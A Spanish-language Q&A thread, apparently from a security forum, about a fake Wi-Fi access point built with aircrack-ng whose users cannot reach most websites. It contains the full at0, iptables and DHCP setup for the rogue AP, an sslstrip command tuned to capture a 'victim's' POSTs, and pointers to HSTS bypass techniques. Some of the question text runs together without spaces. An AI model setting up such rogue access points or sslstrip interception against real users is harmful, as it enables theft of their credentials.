No puedo acceder a la mayoría de los sitios web utilizando un AP falso creado por la suite aircrack-ng

4

La pregunta, Configuración un AP falso - problema con iptables y servidor DNS , lo publiqué antes fue respondido y corregido, para no confundir a las personas que buscan el mismo problema en el futuro. Quería publicar una nueva pregunta que sigue el problema que tenía pero no Realmente tengo algo que ver con eso, ya que la pregunta anterior era sobre mis iptables y llevó a usar un servidor DNS, esta pregunta es solo sobre el DNS y la configuración de mis hosts o, por lo que sospecho, y el tema de esta pregunta es bastante diferente.

Tengo algunas dificultades para acceder a los sitios web utilizando un AP puenteado que hice con la suite aircrack-ng.

No puedo acceder a sitios web como: yahoo, hotmail, google, CNN, etc. Pero puedo acceder a varios sitios web como Facebook, YouTube y la barra de direcciones. La búsqueda con Google Engine funciona bien.
He configurado mi etc / dhcp / dhcpd.conf y mi enrutamiento & Entrada de tablas IP de la siguiente manera;
ejecutando la configuración de iptables y las reglas de enrutamiento at0 (archivo bash):

#!/bin/sh
ifconfig at0 up
ifconfig at0 10.0.0.1 netmask 255.255.255.0
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables -P FORWARD ACCEPT
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
iptables -t nat -A POSTROUTING -o wlan0 -j MASQUERADE

ejecutando el servidor DHCP: /etc/init.d/isc-dhcp-server start

/etc/dhcp/dhcpd.conf file:

authoritative;
default-lease-time 600;
max-lease-time 7200;
subnet 10.0.0.0 netmask 255.255.255.0
{
    option subnet-mask 255.255.255.0;
    option domain-name "freewifi";
    option routers 10.0.0.1;
    option domain-name-servers 194.90.0.1;
    range 10.0.0.10 10.0.0.20;
}

El servidor DNS que estoy usando es el servidor DNS mejor ofrecido con NameBench.py.

Por ejemplo, recibo este mensaje en Google y es el mismo para muchos más sitios web:

Puedohacerping,peronopuedousarousarwget,loquesignificaquerealmentenotengoaccesoaInternet(?)

UsandoKaliLinux,MTUes1500,mivelocidadesde5Mb/susandoconexióninalámbrica.¿Cuáleselproblemaaquí?

  • ACTUALIZACIÓN
    Puedoconectarmedirectamenteasitioswebqueantesnopodíasiescriboenlabarradedirecciones: enlace pero si su sin https dice que no se puede conectar.

Leí en alguna parte que mozila solo permite conexiones HTTPS o podría ser el Kali forzando a HTTPS a que sea seguro. En WireShark veo muchos TCP DUP ACK y RST.

    
pregunta eyal360 30.01.2017 - 11:03
fuente

1 respuesta

3

Después de algunos comentarios, estás en el camino ... ahora debes localizar exactamente tu problema. Para lanzar sslstrip te puedo recomendar esta nomenclatura:

sslstrip -f -p -k -l 10000

-l to listen on port. so 10000 is default, you can avoid this or change port.
-k this kills possible previous sslstrip sessions in progress, recommended.
-f this change the favicon to a lock similar to used in https pages. It rocks if the victim uses old internet explorer versions, useless on chrome and firefox.
-p log only ssls POSTs

Por supuesto, si lo inicias, debes activar la regla: iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000 como dijimos en comentarios anteriores.

Creo que estás haciendo bien los comandos ... pero sslstrip es una técnica de la que depende no solo de tu lado. Si la "víctima" usa buenos enlaces construidos como https://whatever.com , no tiene nada que hacer. Él / ella va a pedir directamente siempre una página encriptada.

Mucha gente dice "HSTS es la solución para sslstrip". Y esto NO ES VERDADERO. Hice sslstrip muchas veces probando el acceso a las páginas con HSTS y funciona ... la clave como dije es que la víctima debe hacer la solicitud inicial de http (sin "s").

Otro factor decisivo es que no se puede omitir ningún tipo de página si usas navegadores comunes en las últimas versiones desde hace algunos años ... Quiero decir, si usas Chrome moderno, Firefox o Internet Explorer, por ejemplo ... estos navegadores tienen una Lista interna de sitios ssl conocidos. Los sitios (como Twitter o Facebook, por ejemplo) nunca se descargarán porque el navegador sabe que SIEMPRE debe buscarlos usando https, incluso si el usuario hizo la "solicitud incorrecta", pero no especificó https: // antes. Supongo que estos sitios pagan a las empresas del navegador para estar en esa lista.

Existen técnicas más avanzadas para hacer sslstrip incluso para las páginas en las listas ... como Delorean attack, o usar sslstrip + también llamado sslstrip2 que requiere dns y proxy, etc. pero son más complicadas.

Le sugiero que pruebe contra páginas ssl poco conocidas porque de esa manera hay menos posibilidades de bloquear sus pruebas con un sitio que se encuentra en las listas internas de ese navegador.

¡Buena suerte!

    
respondido por el OscarAkaElvis 31.01.2017 - 09:14
fuente

Lea otras preguntas en las etiquetas